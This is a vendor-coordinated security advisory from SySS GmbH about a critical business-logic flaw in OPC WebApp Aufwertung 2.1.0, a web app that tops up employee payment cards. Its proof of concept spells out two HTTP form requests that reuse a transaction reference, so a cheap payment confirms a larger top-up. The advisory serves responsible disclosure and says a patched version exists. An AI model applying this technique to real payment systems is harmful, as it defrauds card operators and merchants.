-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2024-089 Product: OPC® WebApp Aufwertung Manufacturer: OPC Affected Version(s): 2.1.0 Tested Version(s): 2.1.0 Vulnerability Type: Business Logic Risk Level: Critical Solution Status: Open Manufacturer Notification: 2024-11-15 Solution Date: 2024-12-19 Public Disclosure: 2025-03-24 CVE Reference: CVE-2025-30073 Author of Advisory: Stefan Krause, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: OPC® WebApp Aufwertung is a web application used to transfer money to employee cards. These cards are then used to pay, e.g., in companies, schools, hospitals, and restaurants. The manufacturer describes the product, which is an integral part of the OPC® CateringApp web app, as follows (see [1]): "Die OPC® CateringApp-WebApp eröffnet zahlreiche neue Möglichkeiten, darunter Online-Aufladungen (eCommerce), Online-Zahlungen [...]" [Translation: The OPC® CateringApp web app opens up numerous new possibilities, including online recharges (eCommerce), online payments [...]"] Due to reusing references, it is vulnerable to business logic attacks. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The reference assigned to transactions can be reused. When completing a payment, the first or all transactions with the same reference are completed, depending on the timing. This can be used to transfer more money to an employee card than has been paid for. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): First, send a transaction request with a high amount: POST /api HTTP/1.1 Host: Cookie: [...] [...] -----------------------------96459980630320972411742839320 Content-Disposition: form-data; name="cardtype" M -----------------------------96459980630320972411742839320 Content-Disposition: form-data; name="ref" ae6735accad0c4c1549 -----------------------------96459980630320972411742839320 Content-Disposition: form-data; name="topupAmount" 100 -----------------------------96459980630320972411742839320 Content-Disposition: form-data; name="lastname" redacted -----------------------------96459980630320972411742839320 Content-Disposition: form-data; name="country" DE -----------------------------96459980630320972411742839320 Content-Disposition: form-data; name="service" ecommerce -----------------------------96459980630320972411742839320 Content-Disposition: form-data; name="action" start-payment -----------------------------96459980630320972411742839320-- Do not complete the payment, leave it open instead. Send another transaction request with the same reference, but with a lower amount, like this: POST /api HTTP/1.1 Host: Cookie: [...] [...] -----------------------------96459980630320972411742839320 Content-Disposition: form-data; name="cardtype" M -----------------------------96459980630320972411742839320 Content-Disposition: form-data; name="ref" ae6735accad0c4c1549 -----------------------------96459980630320972411742839320 Content-Disposition: form-data; name="topupAmount" 1 -----------------------------96459980630320972411742839320 Content-Disposition: form-data; name="lastname" redacted -----------------------------96459980630320972411742839320 Content-Disposition: form-data; name="country" DE -----------------------------96459980630320972411742839320 Content-Disposition: form-data; name="service" ecommerce -----------------------------96459980630320972411742839320 Content-Disposition: form-data; name="action" start-payment -----------------------------96459980630320972411742839320-- Complete the payment for the second request. The first transaction gets confirmed. Therefore, more money is transferred to the employee card than was paid. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Update software version to at least 2.1.3. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2024-11-14: Vulnerability discovered 2024-11-15: Vulnerability reported to manufacturer 2024-12-19: Patch released by manufacturer 2025-03-24: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for OPC® WebApp Aufwertung https://www.opc.de/loesungen/kassensystem-kantine-betriebsrestaurant-gemeinschaft/ [2] SySS Security Advisory SYSS-2024-089 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-089.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Stefan Krause of SySS GmbH. E-Mail: stefan.krause@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Stefan_Krause.asc Key ID: 0x2B2BA6FDD6E172F3 PGP-Fingerprint: 88C8 13B9 FA6A 2FE6 B6D8 7226 2B2B A6FD D6E1 72F3 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 4.0 URL: https://creativecommons.org/licenses/by/4.0/deed.en [1] https://www.opc.de/loesungen/kassensystem-kantine-betriebsrestaurant-gemeinschaft/ -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEclKbntjcoATvvig7z2XWG6ySM3sFAmfZiEkACgkQz2XWG6yS M3uUcQ//cO4b+I6uHVjLtEOKEtG62TQLqQWsWWMDC1u5J7xjcyhBcK9kY8szERhS oBp6kubXtkhxavBancQ304h8gEK5Hgdt/mhwMhTkaSOiwySdKaFJ9Jo+eAZqdD+J D6dkdS8hyRbJtWHauUuL2zmZPfYzgH8vHs20yBvX+mD3dXKt/2Uv9QEiwISLbIo+ hDGf9dInn4L2jWVtARz/rcyu36Y3YFgQ404iX225afCc6x9cHpMaHYE6KfvF+FkH 9tNtlsyrac2YzQAX0O618eYZLYkijCld3xwlBQJo7OxvSy9W6wsxjmzSH5hetOs/ uUNsbtrOUxj4m2DcYFygi07EnevRoVw592iHXTeJeElf3ZHWGB0rIHabN8yJgwQR 7vMB6pZ0k9qtFO2J/2gqoE42fbs+X+AC/3oCPbTi+X/l9SqqPtQiY6C8dEL1TIqE WUHGe5qo+mevddAvzJ+rsXH7opm1GWBW0zfkElIT+4eLfivu+RjQirdVfCNHLEN8 u2IUOSxsoT1v5Nm0AbUoPBJswNjKlE0NTG7NJR8uSpDdACBwhCHI4Wy9JlY9HUU1 sjAn8YLJBvUa6N9YrOuWapt+308OPazWHUiFzDzli0D3Wfq01wlCpZ0yAxnphFZQ dvEMqooSrpI6snoaeQ2x8+b4vbQpx9rFtRgA5tOhg9a3p/m1GTo= =hLsD -----END PGP SIGNATURE-----